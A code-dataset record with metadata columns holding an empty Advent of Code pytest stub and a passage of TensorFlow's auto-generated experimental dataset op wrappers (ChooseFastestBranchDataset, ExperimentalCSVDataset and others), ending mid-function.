| 0.031401
| false
| 0
| 0.009662
| 0
| 0.050725
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3d2aaa2bb45d5af603b3fe40ff51e7535309af62
| 129
|
py
|
Python
|
py/tests/test_sample.py
|
andrewblim/advent-of-code-2020
|
dbc45b9967770f8015f3609b88873bdefcfdc28a
|
[
"MIT"
] | null | null | null |
py/tests/test_sample.py
|
andrewblim/advent-of-code-2020
|
dbc45b9967770f8015f3609b88873bdefcfdc28a
|
[
"MIT"
] | null | null | null |
py/tests/test_sample.py
|
andrewblim/advent-of-code-2020
|
dbc45b9967770f8015f3609b88873bdefcfdc28a
|
[
"MIT"
] | null | null | null |
import pytest
from .context import advent_of_code_2020
# from advent_of_code_2020.dayDD import *
def test_something():
pass
| 18.428571
| 41
| 0.79845
| 20
| 129
| 4.8
| 0.65
| 0.166667
| 0.25
| 0.333333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.072727
| 0.147287
| 129
| 6
| 42
| 21.5
| 0.8
| 0.302326
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0.25
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 9
|
18358b39e1f78d47e6c2f248f24645c1031583d9
| 294,269
|
py
|
Python
|
Lib/site-packages/tensorflow/python/ops/gen_experimental_dataset_ops.py
|
foodwaze0/webapp
|
897043cbbfdbad8d6c54f0556f31e4127d518fc1
|
[
"bzip2-1.0.6"
] | null | null | null |
Lib/site-packages/tensorflow/python/ops/gen_experimental_dataset_ops.py
|
foodwaze0/webapp
|
897043cbbfdbad8d6c54f0556f31e4127d518fc1
|
[
"bzip2-1.0.6"
] | null | null | null |
Lib/site-packages/tensorflow/python/ops/gen_experimental_dataset_ops.py
|
foodwaze0/webapp
|
897043cbbfdbad8d6c54f0556f31e4127d518fc1
|
[
"bzip2-1.0.6"
] | null | null | null |
"""Python wrappers around TensorFlow ops.
This file is MACHINE GENERATED! Do not edit.
"""
import collections as _collections
import six as _six
from tensorflow.python import pywrap_tensorflow as _pywrap_tensorflow
from tensorflow.python.eager import context as _context
from tensorflow.python.eager import core as _core
from tensorflow.python.eager import execute as _execute
from tensorflow.python.framework import dtypes as _dtypes
from tensorflow.python.framework import errors as _errors
from tensorflow.python.framework import tensor_shape as _tensor_shape
from tensorflow.core.framework import op_def_pb2 as _op_def_pb2
# Needed to trigger the call to _set_call_cpp_shape_fn.
from tensorflow.python.framework import common_shapes as _common_shapes
from tensorflow.python.framework import op_def_registry as _op_def_registry
from tensorflow.python.framework import ops as _ops
from tensorflow.python.framework import op_def_library as _op_def_library
from tensorflow.python.util.deprecation import deprecated_endpoints
from tensorflow.python.util import dispatch as _dispatch
from tensorflow.python.util.tf_export import tf_export
from tensorflow.python.util.tf_export import kwarg_only as _kwarg_only
from tensorflow.tools.docs import doc_controls as _doc_controls
def choose_fastest_branch_dataset(input_dataset, ratio_numerator, ratio_denominator, other_arguments, num_elements_per_branch, branches, other_arguments_lengths, output_types, output_shapes, name=None):
r"""TODO: add doc.
Args:
input_dataset: A `Tensor` of type `variant`.
ratio_numerator: A `Tensor` of type `int64`.
ratio_denominator: A `Tensor` of type `int64`.
other_arguments: A list of `Tensor` objects.
num_elements_per_branch: An `int` that is `>= 1`.
branches: A list of functions decorated with @Defun that has length `>= 1`.
other_arguments_lengths: A list of `ints` that has length `>= 1`.
output_types: A list of `tf.DTypes` that has length `>= 1`.
output_shapes: A list of shapes (each a `tf.TensorShape` or list of `ints`) that has length `>= 1`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `variant`.
"""
_ctx = _context._context or _context.context()
if _ctx is not None and _ctx._thread_local_data.is_eager:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._thread_local_data.device_name,
"ChooseFastestBranchDataset", name, _ctx._post_execution_callbacks,
input_dataset, ratio_numerator, ratio_denominator, other_arguments,
"num_elements_per_branch", num_elements_per_branch, "branches",
branches, "other_arguments_lengths", other_arguments_lengths,
"output_types", output_types, "output_shapes", output_shapes)
return _result
except _core._FallbackException:
try:
return choose_fastest_branch_dataset_eager_fallback(
input_dataset, ratio_numerator, ratio_denominator,
other_arguments, num_elements_per_branch=num_elements_per_branch,
branches=branches,
other_arguments_lengths=other_arguments_lengths,
output_types=output_types, output_shapes=output_shapes, name=name,
ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
# Add nodes to the TensorFlow graph.
num_elements_per_branch = _execute.make_int(num_elements_per_branch, "num_elements_per_branch")
if not isinstance(branches, (list, tuple)):
raise TypeError(
"Expected list for 'branches' argument to "
"'choose_fastest_branch_dataset' Op, not %r." % branches)
if not isinstance(other_arguments_lengths, (list, tuple)):
raise TypeError(
"Expected list for 'other_arguments_lengths' argument to "
"'choose_fastest_branch_dataset' Op, not %r." % other_arguments_lengths)
other_arguments_lengths = [_execute.make_int(_i, "other_arguments_lengths") for _i in other_arguments_lengths]
if not isinstance(output_types, (list, tuple)):
raise TypeError(
"Expected list for 'output_types' argument to "
"'choose_fastest_branch_dataset' Op, not %r." % output_types)
output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'choose_fastest_branch_dataset' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
_, _, _op = _op_def_lib._apply_op_helper(
"ChooseFastestBranchDataset", input_dataset=input_dataset,
ratio_numerator=ratio_numerator,
ratio_denominator=ratio_denominator,
other_arguments=other_arguments,
num_elements_per_branch=num_elements_per_branch,
branches=branches,
other_arguments_lengths=other_arguments_lengths,
output_types=output_types,
output_shapes=output_shapes, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = ("Targuments", _op.get_attr("Targuments"),
"num_elements_per_branch",
_op.get_attr("num_elements_per_branch"), "branches",
_op.get_attr("branches"), "other_arguments_lengths",
_op.get_attr("other_arguments_lengths"), "output_types",
_op.get_attr("output_types"), "output_shapes",
_op.get_attr("output_shapes"))
_execute.record_gradient(
"ChooseFastestBranchDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def ChooseFastestBranchDataset(input_dataset, ratio_numerator, ratio_denominator, other_arguments, num_elements_per_branch, branches, other_arguments_lengths, output_types, output_shapes, name=None):
return choose_fastest_branch_dataset(input_dataset=input_dataset, ratio_numerator=ratio_numerator, ratio_denominator=ratio_denominator, other_arguments=other_arguments, num_elements_per_branch=num_elements_per_branch, branches=branches, other_arguments_lengths=other_arguments_lengths, output_types=output_types, output_shapes=output_shapes, name=name)
ChooseFastestBranchDataset.__doc__ = choose_fastest_branch_dataset.__doc__
ChooseFastestBranchDataset = _doc_controls.do_not_generate_docs(_kwarg_only(ChooseFastestBranchDataset))
tf_export("raw_ops.ChooseFastestBranchDataset")(ChooseFastestBranchDataset)
def choose_fastest_branch_dataset_eager_fallback(input_dataset, ratio_numerator, ratio_denominator, other_arguments, num_elements_per_branch, branches, other_arguments_lengths, output_types, output_shapes, name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function choose_fastest_branch_dataset
"""
_ctx = ctx if ctx else _context.context()
num_elements_per_branch = _execute.make_int(num_elements_per_branch, "num_elements_per_branch")
if not isinstance(branches, (list, tuple)):
raise TypeError(
"Expected list for 'branches' argument to "
"'choose_fastest_branch_dataset' Op, not %r." % branches)
if not isinstance(other_arguments_lengths, (list, tuple)):
raise TypeError(
"Expected list for 'other_arguments_lengths' argument to "
"'choose_fastest_branch_dataset' Op, not %r." % other_arguments_lengths)
other_arguments_lengths = [_execute.make_int(_i, "other_arguments_lengths") for _i in other_arguments_lengths]
if not isinstance(output_types, (list, tuple)):
raise TypeError(
"Expected list for 'output_types' argument to "
"'choose_fastest_branch_dataset' Op, not %r." % output_types)
output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'choose_fastest_branch_dataset' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
_attr_Targuments, other_arguments = _execute.convert_to_mixed_eager_tensors(other_arguments, _ctx)
input_dataset = _ops.convert_to_tensor(input_dataset, _dtypes.variant)
ratio_numerator = _ops.convert_to_tensor(ratio_numerator, _dtypes.int64)
ratio_denominator = _ops.convert_to_tensor(ratio_denominator, _dtypes.int64)
_inputs_flat = [input_dataset, ratio_numerator, ratio_denominator] + list(other_arguments)
_attrs = ("Targuments", _attr_Targuments, "num_elements_per_branch",
num_elements_per_branch, "branches", branches, "other_arguments_lengths",
other_arguments_lengths, "output_types", output_types, "output_shapes",
output_shapes)
_result = _execute.execute(b"ChooseFastestBranchDataset", 1,
inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
name=name)
_execute.record_gradient(
"ChooseFastestBranchDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def experimental_assert_next_dataset(input_dataset, transformations, output_types, output_shapes, name=None):
r"""TODO: add doc.
Args:
input_dataset: A `Tensor` of type `variant`.
transformations: A `Tensor` of type `string`.
output_types: A list of `tf.DTypes` that has length `>= 1`.
output_shapes: A list of shapes (each a `tf.TensorShape` or list of `ints`) that has length `>= 1`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `variant`.
"""
_ctx = _context._context or _context.context()
if _ctx is not None and _ctx._thread_local_data.is_eager:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._thread_local_data.device_name,
"ExperimentalAssertNextDataset", name, _ctx._post_execution_callbacks,
input_dataset, transformations, "output_types", output_types,
"output_shapes", output_shapes)
return _result
except _core._FallbackException:
try:
return experimental_assert_next_dataset_eager_fallback(
input_dataset, transformations, output_types=output_types,
output_shapes=output_shapes, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
# Add nodes to the TensorFlow graph.
if not isinstance(output_types, (list, tuple)):
raise TypeError(
"Expected list for 'output_types' argument to "
"'experimental_assert_next_dataset' Op, not %r." % output_types)
output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'experimental_assert_next_dataset' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
_, _, _op = _op_def_lib._apply_op_helper(
"ExperimentalAssertNextDataset", input_dataset=input_dataset,
transformations=transformations,
output_types=output_types,
output_shapes=output_shapes,
name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = ("output_types", _op.get_attr("output_types"), "output_shapes",
_op.get_attr("output_shapes"))
_execute.record_gradient(
"ExperimentalAssertNextDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def ExperimentalAssertNextDataset(input_dataset, transformations, output_types, output_shapes, name=None):
return experimental_assert_next_dataset(input_dataset=input_dataset, transformations=transformations, output_types=output_types, output_shapes=output_shapes, name=name)
ExperimentalAssertNextDataset.__doc__ = experimental_assert_next_dataset.__doc__
ExperimentalAssertNextDataset = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalAssertNextDataset))
tf_export("raw_ops.ExperimentalAssertNextDataset")(ExperimentalAssertNextDataset)
def experimental_assert_next_dataset_eager_fallback(input_dataset, transformations, output_types, output_shapes, name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function experimental_assert_next_dataset
"""
_ctx = ctx if ctx else _context.context()
if not isinstance(output_types, (list, tuple)):
raise TypeError(
"Expected list for 'output_types' argument to "
"'experimental_assert_next_dataset' Op, not %r." % output_types)
output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'experimental_assert_next_dataset' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
input_dataset = _ops.convert_to_tensor(input_dataset, _dtypes.variant)
transformations = _ops.convert_to_tensor(transformations, _dtypes.string)
_inputs_flat = [input_dataset, transformations]
_attrs = ("output_types", output_types, "output_shapes", output_shapes)
_result = _execute.execute(b"ExperimentalAssertNextDataset", 1,
inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
name=name)
_execute.record_gradient(
"ExperimentalAssertNextDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def experimental_auto_shard_dataset(input_dataset, num_workers, index, output_types, output_shapes, name=None):
r"""Creates a dataset that shards the input dataset.
Creates a dataset that shards the input dataset by num_workers, returning a
sharded dataset for the index-th worker. This attempts to automatically shard
a dataset by examining the Dataset graph and inserting a shard op before the
inputs to a reader Dataset (e.g. CSVDataset, TFRecordDataset).
This dataset will throw a NotFound error if we cannot shard the dataset
automatically.
Args:
input_dataset: A `Tensor` of type `variant`.
A variant tensor representing the input dataset.
num_workers: A `Tensor` of type `int64`.
A scalar representing the number of workers to distribute this dataset across.
index: A `Tensor` of type `int64`.
A scalar representing the index of the current worker out of num_workers.
output_types: A list of `tf.DTypes` that has length `>= 1`.
output_shapes: A list of shapes (each a `tf.TensorShape` or list of `ints`) that has length `>= 1`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `variant`.
"""
_ctx = _context._context or _context.context()
if _ctx is not None and _ctx._thread_local_data.is_eager:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._thread_local_data.device_name,
"ExperimentalAutoShardDataset", name, _ctx._post_execution_callbacks,
input_dataset, num_workers, index, "output_types", output_types,
"output_shapes", output_shapes)
return _result
except _core._FallbackException:
try:
return experimental_auto_shard_dataset_eager_fallback(
input_dataset, num_workers, index, output_types=output_types,
output_shapes=output_shapes, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
# Add nodes to the TensorFlow graph.
if not isinstance(output_types, (list, tuple)):
raise TypeError(
"Expected list for 'output_types' argument to "
"'experimental_auto_shard_dataset' Op, not %r." % output_types)
output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'experimental_auto_shard_dataset' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
_, _, _op = _op_def_lib._apply_op_helper(
"ExperimentalAutoShardDataset", input_dataset=input_dataset,
num_workers=num_workers, index=index,
output_types=output_types,
output_shapes=output_shapes,
name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = ("output_types", _op.get_attr("output_types"), "output_shapes",
_op.get_attr("output_shapes"))
_execute.record_gradient(
"ExperimentalAutoShardDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def ExperimentalAutoShardDataset(input_dataset, num_workers, index, output_types, output_shapes, name=None):
return experimental_auto_shard_dataset(input_dataset=input_dataset, num_workers=num_workers, index=index, output_types=output_types, output_shapes=output_shapes, name=name)
ExperimentalAutoShardDataset.__doc__ = experimental_auto_shard_dataset.__doc__
ExperimentalAutoShardDataset = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalAutoShardDataset))
tf_export("raw_ops.ExperimentalAutoShardDataset")(ExperimentalAutoShardDataset)
def experimental_auto_shard_dataset_eager_fallback(input_dataset, num_workers, index, output_types, output_shapes, name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function experimental_auto_shard_dataset
"""
_ctx = ctx if ctx else _context.context()
if not isinstance(output_types, (list, tuple)):
raise TypeError(
"Expected list for 'output_types' argument to "
"'experimental_auto_shard_dataset' Op, not %r." % output_types)
output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'experimental_auto_shard_dataset' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
input_dataset = _ops.convert_to_tensor(input_dataset, _dtypes.variant)
num_workers = _ops.convert_to_tensor(num_workers, _dtypes.int64)
index = _ops.convert_to_tensor(index, _dtypes.int64)
_inputs_flat = [input_dataset, num_workers, index]
_attrs = ("output_types", output_types, "output_shapes", output_shapes)
_result = _execute.execute(b"ExperimentalAutoShardDataset", 1,
inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
name=name)
_execute.record_gradient(
"ExperimentalAutoShardDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def experimental_bytes_produced_stats_dataset(input_dataset, tag, output_types, output_shapes, name=None):
r"""Records the bytes size of each element of `input_dataset` in a StatsAggregator.
Args:
input_dataset: A `Tensor` of type `variant`.
tag: A `Tensor` of type `string`.
output_types: A list of `tf.DTypes` that has length `>= 1`.
output_shapes: A list of shapes (each a `tf.TensorShape` or list of `ints`) that has length `>= 1`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `variant`.
"""
_ctx = _context._context or _context.context()
if _ctx is not None and _ctx._thread_local_data.is_eager:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._thread_local_data.device_name,
"ExperimentalBytesProducedStatsDataset", name,
_ctx._post_execution_callbacks, input_dataset, tag, "output_types",
output_types, "output_shapes", output_shapes)
return _result
except _core._FallbackException:
try:
return experimental_bytes_produced_stats_dataset_eager_fallback(
input_dataset, tag, output_types=output_types,
output_shapes=output_shapes, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
# Add nodes to the TensorFlow graph.
if not isinstance(output_types, (list, tuple)):
raise TypeError(
"Expected list for 'output_types' argument to "
"'experimental_bytes_produced_stats_dataset' Op, not %r." % output_types)
output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'experimental_bytes_produced_stats_dataset' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
_, _, _op = _op_def_lib._apply_op_helper(
"ExperimentalBytesProducedStatsDataset", input_dataset=input_dataset,
tag=tag,
output_types=output_types,
output_shapes=output_shapes,
name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = ("output_types", _op.get_attr("output_types"), "output_shapes",
_op.get_attr("output_shapes"))
_execute.record_gradient(
"ExperimentalBytesProducedStatsDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def ExperimentalBytesProducedStatsDataset(input_dataset, tag, output_types, output_shapes, name=None):
return experimental_bytes_produced_stats_dataset(input_dataset=input_dataset, tag=tag, output_types=output_types, output_shapes=output_shapes, name=name)
ExperimentalBytesProducedStatsDataset.__doc__ = experimental_bytes_produced_stats_dataset.__doc__
ExperimentalBytesProducedStatsDataset = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalBytesProducedStatsDataset))
tf_export("raw_ops.ExperimentalBytesProducedStatsDataset")(ExperimentalBytesProducedStatsDataset)
def experimental_bytes_produced_stats_dataset_eager_fallback(input_dataset, tag, output_types, output_shapes, name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function experimental_bytes_produced_stats_dataset
"""
_ctx = ctx if ctx else _context.context()
if not isinstance(output_types, (list, tuple)):
raise TypeError(
"Expected list for 'output_types' argument to "
"'experimental_bytes_produced_stats_dataset' Op, not %r." % output_types)
output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'experimental_bytes_produced_stats_dataset' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
input_dataset = _ops.convert_to_tensor(input_dataset, _dtypes.variant)
tag = _ops.convert_to_tensor(tag, _dtypes.string)
_inputs_flat = [input_dataset, tag]
_attrs = ("output_types", output_types, "output_shapes", output_shapes)
_result = _execute.execute(b"ExperimentalBytesProducedStatsDataset", 1,
inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
name=name)
_execute.record_gradient(
"ExperimentalBytesProducedStatsDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def experimental_csv_dataset(filenames, compression_type, buffer_size, header, field_delim, use_quote_delim, na_value, select_cols, record_defaults, output_shapes, name=None):
r"""TODO: add doc.
Args:
filenames: A `Tensor` of type `string`.
compression_type: A `Tensor` of type `string`.
buffer_size: A `Tensor` of type `int64`.
header: A `Tensor` of type `bool`.
field_delim: A `Tensor` of type `string`.
use_quote_delim: A `Tensor` of type `bool`.
na_value: A `Tensor` of type `string`.
select_cols: A `Tensor` of type `int64`.
record_defaults: A list of `Tensor` objects with types from: `float32`, `float64`, `int32`, `int64`, `string`.
output_shapes: A list of shapes (each a `tf.TensorShape` or list of `ints`) that has length `>= 1`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `variant`.
"""
_ctx = _context._context or _context.context()
if _ctx is not None and _ctx._thread_local_data.is_eager:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._thread_local_data.device_name,
"ExperimentalCSVDataset", name, _ctx._post_execution_callbacks,
filenames, compression_type, buffer_size, header, field_delim,
use_quote_delim, na_value, select_cols, record_defaults,
"output_shapes", output_shapes)
return _result
except _core._FallbackException:
try:
return experimental_csv_dataset_eager_fallback(
filenames, compression_type, buffer_size, header, field_delim,
use_quote_delim, na_value, select_cols, record_defaults,
output_shapes=output_shapes, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
# Add nodes to the TensorFlow graph.
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'experimental_csv_dataset' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
_, _, _op = _op_def_lib._apply_op_helper(
"ExperimentalCSVDataset", filenames=filenames,
compression_type=compression_type,
buffer_size=buffer_size, header=header,
field_delim=field_delim,
use_quote_delim=use_quote_delim,
na_value=na_value, select_cols=select_cols,
record_defaults=record_defaults,
output_shapes=output_shapes, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = ("output_types", _op.get_attr("output_types"), "output_shapes",
_op.get_attr("output_shapes"))
_execute.record_gradient(
"ExperimentalCSVDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def ExperimentalCSVDataset(filenames, compression_type, buffer_size, header, field_delim, use_quote_delim, na_value, select_cols, record_defaults, output_shapes, name=None):
return experimental_csv_dataset(filenames=filenames, compression_type=compression_type, buffer_size=buffer_size, header=header, field_delim=field_delim, use_quote_delim=use_quote_delim, na_value=na_value, select_cols=select_cols, record_defaults=record_defaults, output_shapes=output_shapes, name=name)
ExperimentalCSVDataset.__doc__ = experimental_csv_dataset.__doc__
ExperimentalCSVDataset = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalCSVDataset))
tf_export("raw_ops.ExperimentalCSVDataset")(ExperimentalCSVDataset)
def experimental_csv_dataset_eager_fallback(filenames, compression_type, buffer_size, header, field_delim, use_quote_delim, na_value, select_cols, record_defaults, output_shapes, name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function experimental_csv_dataset
"""
_ctx = ctx if ctx else _context.context()
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'experimental_csv_dataset' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
_attr_output_types, record_defaults = _execute.convert_to_mixed_eager_tensors(record_defaults, _ctx)
filenames = _ops.convert_to_tensor(filenames, _dtypes.string)
compression_type = _ops.convert_to_tensor(compression_type, _dtypes.string)
buffer_size = _ops.convert_to_tensor(buffer_size, _dtypes.int64)
header = _ops.convert_to_tensor(header, _dtypes.bool)
field_delim = _ops.convert_to_tensor(field_delim, _dtypes.string)
use_quote_delim = _ops.convert_to_tensor(use_quote_delim, _dtypes.bool)
na_value = _ops.convert_to_tensor(na_value, _dtypes.string)
select_cols = _ops.convert_to_tensor(select_cols, _dtypes.int64)
_inputs_flat = [filenames, compression_type, buffer_size, header, field_delim, use_quote_delim, na_value, select_cols] + list(record_defaults)
_attrs = ("output_types", _attr_output_types, "output_shapes",
output_shapes)
_result = _execute.execute(b"ExperimentalCSVDataset", 1,
inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
name=name)
_execute.record_gradient(
"ExperimentalCSVDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def experimental_choose_fastest_dataset(input_datasets, num_experiments, output_types, output_shapes, name=None):
r"""TODO: add doc.
Args:
input_datasets: A list of at least 2 `Tensor` objects with type `variant`.
num_experiments: An `int`.
output_types: A list of `tf.DTypes` that has length `>= 1`.
output_shapes: A list of shapes (each a `tf.TensorShape` or list of `ints`) that has length `>= 1`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `variant`.
"""
_ctx = _context._context or _context.context()
if _ctx is not None and _ctx._thread_local_data.is_eager:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._thread_local_data.device_name,
"ExperimentalChooseFastestDataset", name,
_ctx._post_execution_callbacks, input_datasets, "num_experiments",
num_experiments, "output_types", output_types, "output_shapes",
output_shapes)
return _result
except _core._FallbackException:
try:
return experimental_choose_fastest_dataset_eager_fallback(
input_datasets, num_experiments=num_experiments,
output_types=output_types, output_shapes=output_shapes, name=name,
ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
# Add nodes to the TensorFlow graph.
if not isinstance(input_datasets, (list, tuple)):
raise TypeError(
"Expected list for 'input_datasets' argument to "
"'experimental_choose_fastest_dataset' Op, not %r." % input_datasets)
_attr_N = len(input_datasets)
num_experiments = _execute.make_int(num_experiments, "num_experiments")
if not isinstance(output_types, (list, tuple)):
raise TypeError(
"Expected list for 'output_types' argument to "
"'experimental_choose_fastest_dataset' Op, not %r." % output_types)
output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'experimental_choose_fastest_dataset' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
_, _, _op = _op_def_lib._apply_op_helper(
"ExperimentalChooseFastestDataset", input_datasets=input_datasets,
num_experiments=num_experiments,
output_types=output_types,
output_shapes=output_shapes,
name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = ("N", _op.get_attr("N"), "num_experiments",
_op.get_attr("num_experiments"), "output_types",
_op.get_attr("output_types"), "output_shapes",
_op.get_attr("output_shapes"))
_execute.record_gradient(
"ExperimentalChooseFastestDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def ExperimentalChooseFastestDataset(input_datasets, num_experiments, output_types, output_shapes, name=None):
return experimental_choose_fastest_dataset(input_datasets=input_datasets, num_experiments=num_experiments, output_types=output_types, output_shapes=output_shapes, name=name)
ExperimentalChooseFastestDataset.__doc__ = experimental_choose_fastest_dataset.__doc__
ExperimentalChooseFastestDataset = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalChooseFastestDataset))
tf_export("raw_ops.ExperimentalChooseFastestDataset")(ExperimentalChooseFastestDataset)
def experimental_choose_fastest_dataset_eager_fallback(input_datasets, num_experiments, output_types, output_shapes, name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function experimental_choose_fastest_dataset
"""
_ctx = ctx if ctx else _context.context()
if not isinstance(input_datasets, (list, tuple)):
raise TypeError(
"Expected list for 'input_datasets' argument to "
"'experimental_choose_fastest_dataset' Op, not %r." % input_datasets)
_attr_N = len(input_datasets)
num_experiments = _execute.make_int(num_experiments, "num_experiments")
if not isinstance(output_types, (list, tuple)):
raise TypeError(
"Expected list for 'output_types' argument to "
"'experimental_choose_fastest_dataset' Op, not %r." % output_types)
output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'experimental_choose_fastest_dataset' Op, not %r." % output_shapes)
